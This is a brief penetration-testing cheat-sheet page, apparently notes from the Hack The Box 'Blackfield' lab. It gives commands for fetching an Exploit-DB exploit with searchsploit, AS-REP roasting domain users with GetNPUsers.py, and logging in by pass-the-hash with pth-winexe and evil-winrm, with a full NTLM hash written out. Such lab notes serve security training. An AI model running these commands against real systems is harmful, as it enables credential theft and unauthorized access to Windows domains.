04 Windows Enum & Exploit

ExpolitDB

searchsploit -m 48431

searchsploit -m 48431

User Enum

When you get a possible user list, using the GetNPUsers.py to get the correct user list with the NTML hash. After that, using the command "pth-winexe","evil-winrm" will the NTML hash to log in to the windows system.

python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
# Method 1
pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd

# Method 2
evil-winrm -U svc_backup -H aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796  -i  10.10.10.192

page04 Windows Enum & Exploit

Last updated